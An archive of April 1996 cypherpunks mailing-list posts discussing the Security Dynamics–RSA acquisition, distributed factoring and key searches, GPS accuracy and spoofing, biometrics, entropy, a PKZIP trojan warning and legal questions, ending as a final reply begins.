Message-ID: <199604151505.LAA30805@nrk.com>
MIME-Version: 1.0
Content-Type: text




  Security Dynamics To Acquire RSA In Transaction Valued At Approximately $200
  Million
     

  CAMBRIDGE, Mass. and REDWOOD CITY, Calif.--(BUSINESS WIRE)--April 15,
  1996--Security Dynamics Technologies, Inc. (NASDAQ:SDTI) and RSA Data
  Security, Inc. today announced that they have signed a definitive
  agreement for Security Dynamics to acquire RSA, a Redwood City,
  California vendor of encryption software.  The transaction is intended
  to be carried out by the merger of RSA and a wholly-owned subsidiary of
  Security Dynamics in a tax-free transaction accounted for as a pooling
  of interests.  For the year ended December 31, 1995, RSA had revenues
  and net income of approximately $11,600,000 and $950,000, respectively.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 16 Apr 1996 03:10:37 +0800
To: bugs@netcom.com (Mark Hittinger)
Subject: Re: security dynamics buys pkp?
In-Reply-To: <199604151344.GAA04748@netcom2.netcom.com>
Message-ID: <199604151508.LAA08228@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Hittinger writes:
> As I was trying to wake up this morning I heard an announcement on CNBC that
> Security Dynamics purchased the RSA guys.  It was evidently a stock swap and
> not a cash deal (interesting).

A similar article appears in today's Wall Street Journal.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 16 Apr 1996 06:38:32 +0800
To: Mark Cooke <cypherpunks@toad.com
Subject: Re: Distributed Key Breaking
Message-ID: <199604151814.LAA02463@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:18 PM 4/15/96 +0100, Mark Cooke wrote:
>Just as a quick thought - given the prevelance of Web Browsers - has 
>anyone considered writing a Java Applet that would could run key space 
>searches and factoring in an easily distributed manner.
>
>This would seem to be a 'reasonable' way to gain access to more CPU power 
>- even though the Java code would not be as efficient as a native app. 
>Perhaps as a supplement to the more 'traditional' methods that have been 
>used in the past.

This approach will become even more "reasonable" as just-in-time
compilation and native code Bignum packages get distributed.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 16 Apr 1996 07:27:01 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <199604150519.WAA09619@toad.com>
Message-ID: <199604151824.LAA07600@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



regarding these collaborative, "open" factorizations and cracking
projects:

I have been wondering about malicious hackers getting into these
pools. would it be possible for them to contribute false data
that screws up the end results? or are such anomalies easily
discarded or disregarded by the final processes?

there is a reduction step in the NFS (number field sieve, technique
used to factor large numbers) in which all the collected data is mashed.
how sensitive is this process to spurious data? i.e. if there
was a little bit of bad data in its computation, does it completely
screw it up, or is it robust and resistant to this kind of problem?

it seems to me that in many cases, these collaborative projects
virtually cannot check the validity of the supplied data without
repeating the computation effort, although there may be good
tests that tend to screen out "most" bad data. 

future implementors of these programs might amuse themselves with
trying to create such safeguards or anticipate such "attacks" which
are pretty significant the more the processes become distributed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Tue, 16 Apr 1996 03:44:11 +0800
To: wb8foz@nrk.com
Subject: Re: No matter where you go, there they are.
Message-ID: <9604151827.AA0857@>
MIME-Version: 1.0
Content-Type: text/plain


>Re spoofing the system.  If you think about the geometry of the
>problem, the delay to be induced for each satellite is a time
>varying function of the satellite's position, the reference site,
>and the target. It will vary from positive to negative values for
>many satellite passes.  It can be precomputed, but the precomputed
>adjustment will be in error by some amount due to the orbital
>perturbations mentioned in the original article.  

Fine, but that doesn't address the point missed by the original
article, which is that you don't need to precompute this stuff.
It's easy to compute in real time (under a second) which
eliminates the perturbations issue.  You don't need to worry
about inability to predict those if you're not predicting but
rather measuring/correcting in real time.

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Apr 1996 08:02:02 +0800
To: Ed Carp <talon57@well.com>
Subject: Re: GPS privacy/ECM
Message-ID: <m0u8u5P-0008z9C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:03 AM 4/15/96 +0100, Ed Carp wrote:

>Clinton is supposed to have either turned off dithering or will soon 
>(crossing fingers).  Dithering is a real nuisance at times...

True, but we'll still need DGPS for 1-meter accuracy, as opposed to 20-meter 
accuracy for uncorrected C/A GPS.

Jim Bell, N7IJS





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Rothke <ben.rothke@citicorp.com>
Date: Tue, 16 Apr 1996 05:00:10 +0800
To: jya@pipeline.com>
Subject: RSA & Sec. Dyn.
Message-ID: <199604151631.AA14619@egate.citicorp.com>
MIME-Version: 1.0
Content-Type: text/plain



It's true:

FOR IMMEDIATE RELEASE 

Security Dynamics to Acquire RSA in Transaction Valued at
Approximately $200 Million 

Cambridge MA and Redwood City, CA -- April 15, 1996 -- Security Dynamics Technologies, Inc. 
(NASDAQ: SDTI) and RSA Data Security, Inc. today announced that they have signed a definitive 
agreement for Security Dynamics to acquire RSA, a Redwood City, California vendor of encryption 
software. The transaction is intended to be carried out by the merger of RSA and a wholly-owned 
subsidiary of Security Dynamics in a tax-free transaction accounted for as a  pooling of 
interests. For the year ended December 31, 1995, RSA had revenues and net income of 
approximately $11,6000,000 and $950,000, respectively.



Ben




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 16 Apr 1996 05:46:34 +0800
To: cypherpunks@toad.com
Subject: TOG_oon
Message-ID: <199604151737.NAA10959@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-15-96. FT:

   "Chatter control in cyberspace. US universities are the
   testing ground for free speech issues on the Internet."

   A report on celebrated cases: Cornell, Virginia Tech,
   Memphis, Jake Baker. "Nearly all the university cases in
   the US so far have had sexual overtones."

   Among other commentators quoted, Declan says, "There's a
   very disturbing trend out there to try to control what
   students say online."

   Peter Toren of DoJ says, "I think we can expect this
   controversy to go on for some time."


   TOG_oon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 16 Apr 1996 08:42:34 +0800
To: cypherpunks@toad.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <199604151824.LAA07600@netcom6.netcom.com>
Message-ID: <199604152038.NAA03204@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> writes:

 > I have been wondering about malicious hackers getting into
 > these pools. would it be possible for them to contribute
 > false data that screws up the end results? or are such
 > anomalies easily discarded or disregarded by the final
 > processes?

If you are doing a distributed search of a key space, then it is
of course possible that people, either accidently or
deliberately, may fail to correctly do their part of the search
and report misleading results.  You may recall a hostile attack
on SSL a while back where the design was flawless but the desired
key failed to appear when the results of the individual searches
were merged.

Fortunately, where integer factorization is concerned, it is
trivial to verify the full and partial relations for correctness
and discard any bad data during the counting process.  Thus there
is no chance of garbage making it into the final reduction.

 > there is a reduction step in the NFS (number field sieve,
 > technique used to factor large numbers) in which all the
 > collected data is mashed. how sensitive is this process to
 > spurious data? i.e. if there was a little bit of bad data
 > in its computation, does it completely screw it up, or is it
 > robust and resistant to this kind of problem?

The input to the reduction step is simply a large number of ways
of making the number "1" by multiplying together elements of the
factor base, all modulo the number of be factored.  Given an
overdetermined set of such relations, one can can search for
linearly dependent combinations of their exponents modulo 2. Each
such dependency permits one to construct a relation in which all
the exponents are even, and possibly a non-trivial square root of
1 modulo N.  Since each dependency has at least a 50-50 chance of
yielding a factor of N, only a handful of them are needed.

Certainly bad data in the matrix could cause problems, but the
matrix is sparse and damage would probably be localized.  You
might get out some dependencies that weren't real, but unless you
had quite a lot of garbage data, you would probably get enough
good ones to succeed.  Non-relations involving small primes would
probably be more poisonous than ones involving the high end of
the factor base.  In any case, as I stated earlier, it is trivial
to guarantee all the data going into the final reduction has been
sterilized.

 > it seems to me that in many cases, these collaborative
 > projects virtually cannot check the validity of the
 > supplied data without repeating the computation effort,
 > although there may be good tests that tend to screen out
 > "most" bad data.

 > future implementors of these programs might amuse
 > themselves with trying to create such safeguards or
 > anticipate such "attacks" which are pretty significant the
 > more the processes become distributed.

The only safeguards I can think of when doing a distributed
search of a keyspace are to randomly assign each area to be
searched to multiple participants, and to encapsulate the
software in some sort of hack-resistant module, possibly
calculating a running hash which could be checked when results
were submitted to the central authority.

If you have 10,000 volunteers, each searching 0.01% of the
keyspace using a klutz-proof software module, quite a few
sophisticated users would have to collaborate to create a
significant chance of missing the key.

In cyptography, as in life, there are no guarantees.

--
     Mike          $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 16 Apr 1996 09:52:32 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <ad931eee1502100491ce@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960415135928.14546B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, Timothy C. May wrote:

> That there can be no simple definition of entropy, or randomness, for an
> arbitrary set of things, is essentially equivalent to Godel's Theorem.

I think what you mean is that there is no simple way to measure
randomness.  Simple, nice definitions of randomness do exist.  Actually
there are two closely related definitions of randomness.  The first is
entropy, which is a measure of the unpredictability of a random variable.
(A random variable is a set of values with a probability assigned to each
value.  In this case the values are bit strings.)  The second is
algorithmic complexity, which is a measure of the uncompressibility of a
bit string.  Notice that it doesn't make sense to talk about the entropy
of a string or the algorithmic complexity of a random variable.

Unfortunately both of these values are very difficult to measure.
Algorithmic complexity is provably uncomputable, because given a string
you can't tell when you have found the best compression for it.  Entropy
can in principle be determined, but in practice it's hard because you must
have a good probability model of the mechanism that generates the random
variable.

What we want to do is calculate the entropy of the output of a physical
random number generator.  Now if we have a probability model of the rng,
then we're home free.  For example, if the rng is tossing a fair coin 64
times, then it's easy to calculate that the entropy is 64 bits.  

But what if the rng is too complex to be easily modeled (for example if
it's a human being pounding on the keyboard)?  Algorithmic information
theory says the entropy of a random variable is equal to its expected
algorithmic complexity.  So if we could calculate algorithmic complexity,
then we can estimate the entropy by sampling the output of the rng many
times, calculate the algorithmic complexity of each sample, and take their
average as the estimated entropy.

Unfortunately, we already know that algorithmic complexity is NOT
computable.  The best we can do, and what is already apparently done in
practice, is to find an upper bound (call it x) on the algorithmic
complexity of a string by trying various compression schemes, divide that
number by a constant (say 10), and use x/10 as a conservative estimate of
the algorithmic complexity.

(Tim, I know you already understand all this, but your earlier
explanation wasn't very clear.  I hope this helps those who are still
confused.)

> (To forestall charges that I am relying on an all-too-common form of
> bullshitting, by referring to Godel, what I mean is that "randomness" is
> best defined in terms of algorithmic information theory, a la Kolmogorov
> and Chaitin, and explored in Li and Vitanyi's excellent textbook,
> "Algorithmic Information Theory and its Applications.")

A year ago, you recommended me a book by the same authors titled _An
Introduction to Kolmogorov Complexity and Its Applications_.  Have the
authors written a new book, or are these the same?

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Apr 1996 10:55:33 +0800
To: cypherpunks@toad.com
Subject: Re: Infrared photography
Message-ID: <m0u8vqf-000928C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:16 PM 4/14/96 -0400, Jean-Francois Avon (JFA Technologies, QC, Canada) wrote:

>>Incidentally, this simplicity shows the flaw in using this kind of system as 
>>an identifier:  Since people's faces are usually visible, and can be 
>>photographed in the near-IR surreptitiously, it isn't clear how to prevent 
>>faking a face which appears to have the same IR signature and pattern.
>
>I remember in a booklet from Kodak on their Ektachrome IR film, there was a
>picture
>of a forearm where all the veins were made clearly visible.  This film is near 
>infrared (if I remember, the red color on the film corresponds to around
>1100 nm).

1100 sounds pretty far into the IR spectrum for silver-halide film to pick 
up, but I don't know how far they can "push" film to do this.  Silicon CCD 
image pickups peak at somewhere around 900 nm, but they can probably handle 
1100 nm at a reduced sensitivity.


>Veins and artery identification might be possible, maybe, since fingerprint
>identification is possible.  A friend of mine developped a quite functionnal 
>algorithm doing just that in the late eighties.  OTOH, the blood vessels
>patterns are probably much more constant, from individual to individual,
>than fingerprints.  Just correct me if I am wrong.

Do you mean "constant" over time?  Fingerprints are fairly constant, I 
assume artery and vein number and location is fairly constant too if major 
weight gains and losses can be ignored.  What I don't know is how unique 
such blood vessel patterns are, compared to fingerprints.  The huge numbers 
frequently given to show how unique fingerprint patterns are, and thus how 
reliable fingerprinting techniques are often based on a full set of 10 
fingerprints, not just one print.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Computer Virus Help Desk <vhd@pobox.com>
Date: Tue, 16 Apr 1996 08:14:33 +0800
To: cypherpunks@toad.com
Subject: Re: Trojan Horse Loose On The Internet
Message-ID: <2.2.32.19960415183326.006d334c@indy.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:40 PM 4/15/96 +0800, wolv@infosys.utm.my (Ramli Bin Jaafar) wrote:

>According to several reliable sources there is a deadly virus on the
>Internet.  This is NOT a hoax! 

I hope the following message from CIAC helps explain that this is aTROJAN
and NOT a VIRUS:

> From: ciac@llnl.gov
> Subject: RE:PKZIP trojan horse?
> Date: Monday, April 01, 1996 11:26AM

> ============The following is from PKWare =============

> It  has come to PKWARE's attention that a trojan version of PKZIP is being
> distributed under the name PKZ300B.ZIP or PKZ300B.EXE. This version is not
> an offical version and will attempt to destroy your HD. Delete it immediately
> if you have downloaded this version. If you have any further questions about
> this trojan version, contact PKWARE at: support@pkware.com.

>  ======= End PKWare Message ===

> PKWare lists the following as known PKZIP related hacks (modified or bogus
versions) as of 06/01/95:
>     PKZIP120       Early hack of 1.1
>     PKZIP20B       Hack of 1.1
>    PKZIP_V2.EXE   Trojan, will erase hard drive
>     PKZ201.ZIP     Hack of 1.93
>     PKZ201.EXE          "
>     PKX201.EXE          "
>     PKZ201.EXE          "
>     PKX201.EXE          "
>     PKZ210F.EXE    Unknown
>     PKZIPV2        **TROJAN** will erase hard drives
>     PKUNZIP.COM    Unknown
>     PKZIP203.EXE   Unknown
>     PUTAV 1.93     Fake putav program (Trojan)
>     PKZIP 1.99     Unknown
>     PKZIP 2.02     Unknown
>     PKZIP 2.2      **TROJAN** destroys hard drives
>     PKZ305.EXE     Hack of 1.93, fave AV, **VIRUS**
>     PKZ41V.EXE     Hack of 1.93
>     PKZ300B.ZIP    Trojan, will erase hard drives
>     PKZ300B.EXE         "
>  If you have any questions or problems, please let us know.
>  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Computer Incident Advisory Capability (CIAC)    David L. Crawford
> (510)422-8193                                   (510)423-9905
> ciac@llnl.gov                                   crawford1@llnl.gov
> (510)422-8193                                   (510)423-9905
> ciac@llnl.gov                                   crawford1@llnl.gov
>  **************

I hope this answers questions concerning PKZ300.ZIP

Computer Virus Help Desk
http://www.a1.com/cvhd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Tue, 16 Apr 1996 10:27:28 +0800
To: cypherpunks@toad.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <199604151824.LAA07600@netcom6.netcom.com>
Message-ID: <199604152135.OAA07769@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
>I have been wondering about malicious hackers getting into these
>pools. would it be possible for them to contribute false data
>that screws up the end results? or are such anomalies easily
>discarded or disregarded by the final processes?

The latter, for this application -- unlike the straightforward approach to
RC4 cracking, the partial relations that contributors find for the
factoring exercise are (like the factoring itself) time-consuming to
compute but dead simple to check... and, in fact, each of them is checked
before accepting it.

>it seems to me that in many cases, these collaborative projects
>virtually cannot check the validity of the supplied data without
>repeating the computation effort, although there may be good
>tests that tend to screen out "most" bad data. 

Yes, that's a good point and one we hashed around a bit at the beginning
of the RC4 project, with less than a perfect conclusion -- but some good
ideas.  You need to account for several kinds of people, including people
plaing with less than a full deck of clues; and the target of the cracking
ring allocating and turning in a "not found" report on the actual target
part of the space.

>future implementors of these programs might amuse themselves with
>trying to create such safeguards or anticipate such "attacks" which
>are pretty significant the more the processes become distributed.

Absolutely.

	Jim Gillogly
	Trewesday, 25 Astron S.R. 1996, 21:32




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Tue, 16 Apr 1996 14:10:59 +0800
To: cypherpunks@toad.com
Subject: patent licenses
Message-ID: <199604152140.OAA02717@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> writes:

>Well, if you're using RC4, you're probably using some sort of public-key 
>based key exchange, which you're probably going to need to licence, and 
>BSAFE is the easiest way to do that,  so RC4 is pretty much a freebie

If the Diffie-Hellmann patent covers all kind of public key crypto,
you need a license from Cylink, i.e. BSAFE is not enough, and if it
doesn't you can use El Gamal without a license.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 16 Apr 1996 07:37:46 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: GPS privacy/ECM
In-Reply-To: <m0u8u5P-0008z9C@pacifier.com>
Message-ID: <Pine.3.89.9604151445.C13698-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Apr 1996, jim bell wrote:

> At 11:03 AM 4/15/96 +0100, Ed Carp wrote:
> 
> >Clinton is supposed to have either turned off dithering or will soon 
> >(crossing fingers).  Dithering is a real nuisance at times...
> 
> True, but we'll still need DGPS for 1-meter accuracy, as opposed to 20-meter 
> accuracy for uncorrected C/A GPS.

Better than what we have now - isn't GPS guaranteed to within 100 meters 
or so?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Apr 1996 14:29:01 +0800
To: Hal <unicorn@schloss.li
Subject: Re:  What can the judge do to me?
Message-ID: <m0u8wb7-0008zLC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 4/15/96 -0700, Hal wrote:
>From: Black Unicorn <unicorn@schloss.li>

>
>> The key to limiting the ability of a court to summarily enter contempt 
>> sanctions has always been the classification of the sanctions.  
>> "Criminal" sanctions, may entitle the witness to a trial by jury.
>> [...]
>> "Civil" sanctions do 
>> not require such protections and can be imposed on the spot and 
>> without review.
>
>I didn't understand what distinguishes civil and criminal sanctions.  Is
>it the nature of the proceedings, whether it is a civil or criminal case
>that is before the judge?  Or is it the nature of the contempt charge
>itself, where not doing what the judge wants, in broad terms, is civil
>contempt?  And in that case, what would be criminal contempt?

He may answer those questions, but I don't think he'll dare answer the 
question about if there is a constituional justification for a difference 
between "civil" and "criminal" in most things the government's courts do.  
My impression is that the "civil" classification is often simply used to 
dilute or eliminate the various constitutional protections that the 
government hasn't yet dared to remove from areas it calls "criminal."

Too bad we won't get a straight answer...

We also won't get a straight answer about the constitutional justification 
for "contempt of court" penalties at all!  The Constitution defines the 
powers of government; it does not restrict those of the people. The idea 
that a judge can punish someone, especially someone not present in court, is 
bizarre.  It is even more odd when such punishment appears to exceed what 
the government is allowed to do absent any kind of jury decision and 
conviction.

If you're willing to accept NON-Constitutional "justifications," I'm sure 
you'll get plenty of that.

The only hint of a Constitutional obligation to testify comes from an 
amendment which states that defendants have a right to compel testimony 
favorable to them; it does not say that prosecution has the right to compel 
testimony from a third party that incriminates a defendant.    If his 
response is, "Oh, but we've ALWAYS done it that way!", you need to remember 
that until the American Civil war, slavery was legal in southern states, and 
until 1920 women weren't allowed to vote, and until 1955 "separate but 
equal" was the law of the land, until 1972 or so the death penalty was 
constitutional...and then it wasn't...and then it was again...and so on.  
Government is never willing to admit it's wrong until it's good and ready.  
That doesn't mean we can't express our own opinions "prematurely."

I'd sure like to hear the "why" behind this stuff, but I won't...  Sigh.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Cooke <mpc@star.sr.bham.ac.uk>
Date: Tue, 16 Apr 1996 02:13:50 +0800
To: cypherpunks@toad.com
Subject: Distributed Key Breaking
Message-ID: <Pine.SOL.3.91.960415151333.14114J-100000@xun9>
MIME-Version: 1.0
Content-Type: text/plain


Just as a quick thought - given the prevelance of Web Browsers - has 
anyone considered writing a Java Applet that would could run key space 
searches and factoring in an easily distributed manner.

This would seem to be a 'reasonable' way to gain access to more CPU power 
- even though the Java code would not be as efficient as a native app. 
Perhaps as a supplement to the more 'traditional' methods that have been 
used in the past.

Regards,

Mark

------------------------------------------------------------------------------
Mark Cooke                             The views expressed above are mine
Systems Programmer                     and do not reflect in any way the
University Of Birmingham               current policy of my employers.
------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wolv@infosys.utm.my (Ramli Bin Jaafar)
Date: Mon, 15 Apr 1996 19:29:27 +0800
To: cypherpunks@toad.com
Subject: Trojan Horse Loose On The Internet
Message-ID: <19960415073947953.AAA74@Executioner.utm.my>
MIME-Version: 1.0
Content-Type: text/plain


According to several reliable sources there is a deadly virus on the
Internet.  This is NOT a hoax! 
CAN ANYBODY CHECK THIS OUT, PLEASE..

Note: The reliability of all information below is UNKNOWN.
     
WHAT:
Virus Alert:  PKZIP 3.0 Trojan Loose on the Internet
    
BACKGROUND:
A trojan (virus) program, PKZIP 3.0, which is advertised as an updated
version of the popular compression utility PKZIP, is currently being
distributed on the Internet.  Please note that this trojan is REAL and
DESTRUCTIVE.  Once executed, this program will destroy data on your hard
drive; there's no stopping it.

According to PKWARE, makers of PKZIP, the only released versions of PKZIP
are:  1.10, 1.93, 2.04c, 2.04e and 2.04g.  All other versions currently
circulating on the Internet are suspect and should not be used.

ACTION REQUIRED:
Please do not download or execute any files that are named PKZ300B.EXE,
PKZ300B.ZIP, PKZIP300.ZIP, PKZIP300.EXE, etc. from the Internet or other
external source.

Anybody with any information on this..??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Best Regards,
                       _\|/_
                      Q(@ @)Q
|-------------------oOO-(_)-OOo--------------------|
|      If I can, it doesn't mean that I will.      |
|--------------------------------------------------|
|                Ramli Bin Jaafar                  |
|Faculty Of Computer Science And Information System| 
|       University Technology Of Malaysia,         |  
|              80990 Johor Baharu,                 | 
|              Johor Darul Takzim,                 | 
|                   Malaysia.                      |
|         Tel: (607)-5576160 ext: 3593             | 
|--------------------------------------------------|
|         E-mail: wolv@infosys.utm.my              |
|                 ramli@raptor.utm.my              |
|                 wolv@cyberspace.org              | 
|--------------------------------------------------| 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lurch <apd@openix.com>
Date: Tue, 16 Apr 1996 08:41:55 +0800
To: cypherpunks@toad.com
Subject: Hey...  someone please teach me...
Message-ID: <199604152022.QAA09109@pantera.openix.com>
MIME-Version: 1.0
Content-Type: text/plain


hey,
 i figured this would be as good place to ask as any...
If possible, and if you have some free time, would someone please
PRIVATELY mail me and explain PGP and similar types of encryption.
I am extremely interested in the topic, but there isn't much I can
see from any of the source code floating around everywhere, not
too much docs on the algo itself...  Please do not recommend books,
as I seriously have no ability to get them. :(
 - Mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 16 Apr 1996 10:18:52 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: key bit lengths
In-Reply-To: <ad9713050002100436c2@[205.199.118.202]>
Message-ID: <Pine.LNX.3.92.960415161540.304A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 14 Apr 1996, Timothy C. May wrote:

> A late April Fool's joke, methinks? Arguing that in "several billion years"
> the "temperature" of the universe will have anything to do with
> computation....well, your physics is all wrong.
>
> The approximate figure, kT, for the minimum energy in a conventional bit
> flip, can be reduced by simple cooling. Not a problem. And what the
                          ^^^^^^^^^^^^^^
> so-called "average temperature" of the Universe may be in, say, 10 billion
> years, will not affect computation. Fusion will still occur, stars will
> still burn, sunshine will still produce heat. And so on.

I'm a little rusty on physics, but it seems to me that you are forgetting the
fact that energy needs to be used in order to lower the temperature below the
temperature of background radiation.  A lot of energy.  I don't have any
numbers available, but I think that it would takes much more energy to invert
a bit where energy has to be used to keep the temperature below the temperature
of background radiation then to invert the bit at temperatures greater than or
equal to the temperature of background radiation.  Brute-force cracking will
take less energy when the universe has cooled off more (assuming it does
implode first).

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMXKwFbZc+sv5siulAQFv8wP/aiC93myrk4swZYJ2ocCVsvy/+HAJyu/9
ujQl910QUrs27BfkHfiHnVbTYUWQycEPxe0o4b6KGOJwkJ2TssMpuVY5TE+35GKL
a0fdaaKUxb2DDXWvr6jyOi682dLzx0gqvMo+gWXSKccFk8U5KcHZEh9TL53CopvP
2KzTet/lB0o=
=ef7j
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 16 Apr 1996 08:26:13 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Article on PGP flaws
Message-ID: <199604152026.QAA31962@nrk.com>
MIME-Version: 1.0
Content-Type: text


I'm told a periodical:
	Crypto & Security
	Vol 15 #1
has an article: 
	Probabilistic [sp] Flaws in PGP {aprox title}
	by Thierry Moreau

Has anyone seen/commented on it?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Tue, 16 Apr 1996 13:05:39 +0800
To: cypherpunks@toad.com
Subject: Re: RSA & Sec. Dyn.
In-Reply-To: <199604151631.AA14619@egate.citicorp.com>
Message-ID: <Pine.BSF.3.91.960415162807.22774A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> It's true:
> FOR IMMEDIATE RELEASE 
> Security Dynamics to Acquire RSA in Transaction Valued at
> Approximately $200 Million 

Okay, so what do we know about Security Dynamics? What are they expected
to do about licensing etc? 

The question of the day is... HOW WILL THIS AFFECT CRYPTO?

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Apr 1996 13:06:53 +0800
To: Ben Rothke <cypherpunks@toad.com
Subject: Re: RSA & Sec. Dyn.
Message-ID: <m0u8y6n-00090vC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 PM 4/15/96 edt, Ben Rothke wrote:

>FOR IMMEDIATE RELEASE 
>
>Security Dynamics to Acquire RSA in Transaction Valued at
>Approximately $200 Million 
>
